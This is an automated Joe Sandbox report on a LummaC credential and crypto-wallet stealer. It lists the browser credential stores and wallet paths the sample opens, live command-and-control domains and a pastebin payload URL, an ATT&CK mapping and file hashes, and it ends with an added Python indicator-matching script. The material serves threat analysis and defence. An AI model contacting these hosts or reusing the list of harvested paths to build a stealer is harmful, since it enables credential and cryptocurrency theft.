            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: Contrast.com | Binary or memory string: WIN_81
            Source: Contrast.com | Binary or memory string: WIN_XP
            Source: Contrast.com | Binary or memory string: WIN_XPe
            Source: Contrast.com | Binary or memory string: WIN_VISTA
            Source: Contrast.com | Binary or memory string: WIN_7
            Source: Contrast.com | Binary or memory string: WIN_8
            Source: Set.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
            Source: Yara match | File source: 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Contrast.com PID: 6180, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0058696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_0058696E
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00586E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00586E32

            MITRE ATT&CK Matrix (techniques listed per tactic; numeric prefixes as shown in the matrix)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 21 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 11 Masquerading; 2 Valid Accounts; 121 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection
            Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 2 System Time Discovery; 1 Account Discovery; 13 File and Directory Discovery; 37 System Information Discovery; 141 Security Software Discovery; 121 Virtualization/Sandbox Evasion; 4 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Archive Collected Data; 31 Data from Local System; 21 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 1 Web Service; 2 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph (rendered image not included). Behavior Graph ID: 1565284, Sample: 'Setup.exe, Startdate: 29/11/2024, Architecture: WINDOWS, Score: 100
            Graph contents recovered from the image data:
            • Sample level: contacts pastebin.com, snowqueen.site and 5 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 9 other signatures, Connects to a pastebin service (likely for C&C)
            • 'Setup.exe (started) drops C:\Users\user\AppData\Local\Temp\Set (COM) and starts cmd.exe
            • cmd.exe drops C:\Users\user\AppData\Local\...\Contrast.com (PE32); signature: Drops PE files with a suspicious file extension; starts Contrast.com, cmd.exe, conhost.exe and 6 other processes
            • Contrast.com contacts lumdexibuy.shop (104.21.63.229, port 443), pastebin.com (104.20.4.235, port 443) and silversky.club (104.21.58.9, port 443), all CLOUDFLARENETUS, United States; drops C:\Users\...\VKLM5S46YTD8XS7X69X8S6283E.ps1 (ASCII); signatures: Query firmware table information (likely to detect VMs), Found many strings related to Crypto-Wallets (likely being stolen), Tries to harvest and steal browser information (history, passwords, etc), Tries to steal Crypto Currency Wallets; starts two powershell.exe instances
            • powershell.exe: signatures: Found many strings related to Crypto-Wallets (likely being stolen), Loading BitLocker PowerShell Module; starts WmiPrvSE.exe and conhost.exe; the second powershell.exe starts conhost.exe

            Source | Detection | Scanner | Label | Link
            'Setup.exe | 13% | ReversingLabs | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\108941\Contrast.com | 3% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\Set | 0% | ReversingLabs | |

            No Antivirus matches
            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            https://..queen. | 0% | Avira URL Cloud | safe |
            https://lumdexibuy.shop/ms | 0% | Avira URL Cloud | safe |
            https://lumdexibuy.shop/api | 0% | Avira URL Cloud | safe |
            https://lumdexibuy.shop/( | 0% | Avira URL Cloud | safe |
            https://go.microsofDz | 0% | Avira URL Cloud | safe |
            lumdexibuy.shop | 0% | Avira URL Cloud | safe |
            https://snowqueen.site/calling.php?compName= | 0% | Avira URL Cloud | safe |
            https://go.microsofD | 0% | Avira URL Cloud | safe |
            http://crl.microsofth | 0% | Avira URL Cloud | safe |
            https://silversky.club/4b882c8/script | 100% | Avira URL Cloud | malware |
            https://snowqueen.site/calling.php?compName=user-PC | 0% | Avira URL Cloud | safe |
            https://lumdexibuy.shop/e | 0% | Avira URL Cloud | safe |
            https://snowqueen.site | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            silversky.club | 104.21.58.9 | true | false | | high
            pastebin.com | 104.20.4.235 | true | false | | high
            lumdexibuy.shop | 104.21.63.229 | true | true | | unknown
            cdn1.pixel-story.shop | unknown | unknown | false | | high
            snowqueen.site | unknown | unknown | true | | unknown
            GJNYzyvbesUVEaJQoujpar.GJNYzyvbesUVEaJQoujpar | unknown | unknown | true | | unknown
            masa.r2cloudzugybyi8.shop | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://lumdexibuy.shop/api | true | Avira URL Cloud: safe | unknown
            https://pastebin.com/raw/erLX7UsT | false | | high
            https://silversky.club/4b882c8/script | false | Avira URL Cloud: malware | unknown
            lumdexibuy.shop | true | Avira URL Cloud: safe | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | false
            104.21.63.229 | lumdexibuy.shop | United States | 13335 | CLOUDFLARENETUS | true
            104.21.58.9 | silversky.club | United States | 13335 | CLOUDFLARENETUS | false
            Joe Sandbox version: 41.0.0 Charoite
            Analysis ID: 1565284
            Start date and time: 2024-11-29 15:11:06 +01:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 7m 13s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of new started processes analysed: 19
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: 'Setup.exe
            Detection: MAL
            Classification: mal100.troj.spyw.evad.winEXE@27/22@7/3
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 82
            • Number of non-executed functions: 312
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 3500 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 980 because it is empty
            • Not all processes were analyzed; the report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: 'Setup.exe
            Time | Type | Description
            09:11:54 | API Interceptor | 1x Sleep call for process: 'Setup.exe modified
            09:12:00 | API Interceptor | 12x Sleep call for process: Contrast.com modified
            09:13:15 | API Interceptor | 24x Sleep call for process: powershell.exe modified
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

Match: 104.20.4.235
  gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  gaber.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
  sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
  envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
  New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr

Match: 104.21.63.229
  http://cabonusoffer.com/track/ | malicious | Unknown

Match: 104.21.58.9
  Setup.exe | malicious | LummaC
  SeT_up.exe | malicious | LummaC Stealer
  Setup.exe | malicious | LummaC
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

Match: pastebin.com
  segura.vbs | malicious | Unknown | 104.20.3.235
  DHL-SHIPMENT-DOCUMENT-BILL-OF-LADING-PACKING-LIST.exe | malicious | PureLog Stealer, XWorm | 172.67.19.24
  Rooming list.js | malicious | Remcos | 104.20.4.235
  https://pastebin.com/raw/0v6Vhvpb | malicious | Unknown | 104.20.4.235
  saiya.exe | malicious | AsyncRAT, XWorm | 172.67.19.24
  file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 104.20.3.235
  SystemCoreHelper.dll | malicious | LummaC Stealer | 104.20.3.235
  Setup.exe | malicious | LummaC | 104.20.3.235
  17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe | malicious | XWorm | 104.20.3.235
  SeT_up.exe | malicious | LummaC Stealer | 104.20.4.235

Match: silversky.club
  Setup.exe | malicious | LummaC | 104.21.58.9
  SeT_up.exe | malicious | LummaC Stealer | 104.21.58.9
  Setup.exe | malicious | LummaC | 104.21.58.9
  Setup.exe | malicious | LummaC | 172.67.167.196
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

Match: CLOUDFLARENETUS
  !SET__UP.exe | malicious | LummaC Stealer | 172.67.187.171
  file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim | 172.67.162.65
  phish_alert_sp2_2.0.0.0.eml | malicious | CredentialStealer | 162.247.243.29
  file.exe | malicious | LummaC Stealer | 104.21.81.153
  https://arkansasbaptist.info/o360/index.html | malicious | HTMLPhisher | 104.21.71.217
  http://csssssswdsaawsssdwqeqw.1008611.cfd:8443/match | malicious | Unknown | 104.21.38.249
  file.exe | malicious | LummaC Stealer | 172.67.165.166
  https://simplebooklet.com | malicious | Unknown | 104.17.25.14
  Employee_Important_Message.pdf | malicious | Unknown | 172.67.74.152
  botx.ppc.elf | malicious | Mirai | 104.27.44.61
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

Match: a0e9f5d64349fb13191bc781f81f42e1
  !SET__UP.exe | malicious | LummaC Stealer | 104.21.58.9, 104.20.4.235, 104.21.63.229
  file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim | 104.21.58.9, 104.20.4.235, 104.21.63.229
  file.exe | malicious | LummaC Stealer | 104.21.58.9, 104.20.4.235, 104.21.63.229
  file.exe | malicious | LummaC Stealer | 104.21.58.9, 104.20.4.235, 104.21.63.229
  file.exe | malicious | LummaC Stealer | 104.21.58.9, 104.20.4.235, 104.21.63.229
  file.exe | malicious | LummaC Stealer | 104.21.58.9, 104.20.4.235, 104.21.63.229
  file.exe | malicious | LummaC Stealer | 104.21.58.9, 104.20.4.235, 104.21.63.229
  file.exe | malicious | LummaC Stealer | 104.21.58.9, 104.20.4.235, 104.21.63.229
  file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc | 104.21.58.9, 104.20.4.235, 104.21.63.229
  qAyJeM1rqk.exe | malicious | LummaC | 104.21.58.9, 104.20.4.235, 104.21.63.229
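The IP, domain, ASN and JA3 tables above are the network indicators a responder would pull from this report, and they are not all worth the same. The pastebin raw URL and silversky.club are specific to this activity; the three 104.x addresses sit in CLOUDFLARENETUS and front many unrelated sites, and a JA3 hash identifies a TLS client stack rather than the malware, so those two only corroborate. The script below is an added example, not part of the Joe Sandbox report: it matches the report's indicators against connection logs and tiers the hits so that a CDN IP plus a common JA3 alone does not page anyone. The key=value log format, the log lines, the hostnames blog.example.net and www.example.com, and the tier rules are constructed for the example.

```python
"""Match this report's network indicators against connection logs.

Added example, not part of the Joe Sandbox report. Indicator values come from
the report's IP, domain, ASN and JA3 tables; the key=value log format, the log
lines and the tier rules are constructed for the demo (no real product's format).
"""
import re
from dataclasses import dataclass, field

# From the report tables. pastebin.com itself is not used as an indicator:
# the site is legitimate, only the raw paste URL is specific (assumption).
IOC_URLS = {"pastebin.com/raw/sA04Mwk2"}                         # paste fetched by the samples
IOC_DOMAINS = {"silversky.club"}                                  # domain tied to the LummaC samples
IOC_CDN_IPS = {"104.21.58.9", "104.20.4.235", "104.21.63.229"}   # CLOUDFLARENETUS, shared
IOC_JA3 = {"a0e9f5d64349fb13191bc781f81f42e1"}                    # TLS client fingerprint

# Tier = how much a hit means on its own (triage convention, not the report's).
# CDN IPs front many unrelated sites; JA3 fingerprints the TLS stack, not the
# malware. Both only corroborate a stronger hit.
TIER = {"url": "high", "domain": "high", "ip": "low", "ja3": "low"}

LINE_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')   # constructed key=value format

def parse_line(line: str) -> dict:
    return {k: v.strip('"') for k, v in LINE_RE.findall(line)}

@dataclass
class Verdict:
    line_no: int
    hits: list = field(default_factory=list)    # (indicator_type, value, tier)

    @property
    def score(self) -> str:
        if any(t == "high" for _, _, t in self.hits):
            return "alert"
        if len(self.hits) >= 2:
            return "review"       # e.g. CDN IP + JA3: worth a look, not an alert
        return "note" if self.hits else "clean"

def match_event(ev: dict) -> list:
    hits = []
    host = ev.get("host", "").lower()
    url = host + ev.get("path", "")
    if url in IOC_URLS:
        hits.append(("url", url, TIER["url"]))
    if host in IOC_DOMAINS:
        hits.append(("domain", host, TIER["domain"]))
    if ev.get("dst") in IOC_CDN_IPS:
        hits.append(("ip", ev["dst"], TIER["ip"]))
    if ev.get("ja3", "").lower() in IOC_JA3:
        hits.append(("ja3", ev["ja3"].lower(), TIER["ja3"]))
    return hits

def scan(lines) -> list:
    """Return a Verdict for every line with at least one hit."""
    out = []
    for n, line in enumerate(lines, 1):
        v = Verdict(n, match_event(parse_line(line)))
        if v.hits:
            out.append(v)
    return out

# Constructed log. Line 3 is a benign site behind the same CDN address with the
# same TLS stack: the false positive the tiering keeps out of the alert queue.
SAMPLE_LOG = """\
ts=09:12:01 src=10.0.0.5 dst=104.20.4.235 host=pastebin.com path=/raw/sA04Mwk2 ja3=a0e9f5d64349fb13191bc781f81f42e1
ts=09:12:05 src=10.0.0.5 dst=104.21.58.9 host=silversky.club path=/api ja3=a0e9f5d64349fb13191bc781f81f42e1
ts=09:12:09 src=10.0.0.7 dst=104.21.63.229 host=blog.example.net path=/ ja3=a0e9f5d64349fb13191bc781f81f42e1
ts=09:12:12 src=10.0.0.8 dst=203.0.113.10 host=www.example.com path=/ ja3=0000000000000000000000000000ffff
""".splitlines()

if __name__ == "__main__":
    for v in scan(SAMPLE_LOG):
        print(f"line {v.line_no}: {v.score:<6} {v.hits}")
```

Lines 1 and 2 score "alert" on the URL and the domain; line 3 carries only the shared IP and the JA3 and scores "review"; line 4 produces no verdict at all. When feeding real proxy or firewall data, match the URL on host plus path after normalisation, since the same paste can be fetched over http or https and with a trailing query.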
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

Match: C:\Users\user\AppData\Local\Temp\108941\Contrast.com
  !SET__UP.exe | malicious | LummaC Stealer
  file.exe | malicious | Unknown
  file.exe | malicious | Unknown
  lem.exe | malicious | Vidar
  receipt-016.vbs | malicious | Remcos, AsyncRAT, XWorm
  Lw5RC3lKVg.exe | malicious | Stealc
  file.exe | malicious | DanaBot
  8Y78ZNdmmQ.exe | malicious | Amadey, LockBit ransomware, PureLog Stealer, zgRAT
  AacAmbientLighting.exe | malicious | Unknown
  AacAmbientLighting.exe | malicious | Unknown
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:Nlllulk:NllU
MD5: E3761B426AE48FB1A0DC4185939CE050
SHA1: 68FE06F45EF35CA47E1DB124FEE98132D9BB5F7C
SHA-256: 0E97F83FAA0ED9C80EAEA1630FABAE55C3D86E1F9E506BA128080F8A22DBFD89
SHA-512: 061A4939A10722B1F92A1A7787D41834509B683813889E93BF9E38C4034FFE2B26FA4E562B69FE6A8F4C75C49C9B45AEF620B05C409B8D1D8A729962D55E5656
Malicious: false
Preview: @...e.................................:..............@..........

Process: C:\Windows\SysWOW64\cmd.exe
File Type: data
Category: dropped
Size (bytes): 483809
Entropy (8bit): 7.9996561028805235
Encrypted: true
SSDEEP: 12288:Sv82akbFzP+MRk1WqT4IbQ8a8ute2dRt9xDC6tqtt1sK8UPR:j2lVPF04iQ7trdtzsl8UPR
MD5: 806B6DD473DCACBF71A3FDE7FC46BA75
SHA1: 5D4852EF29C3D05A0637D42E244A2DB17753866A
SHA-256: 08219B5AC5051356D52AAC4C9D5C72152C74F96B2F4FECEE3F3773ECBF1B5927
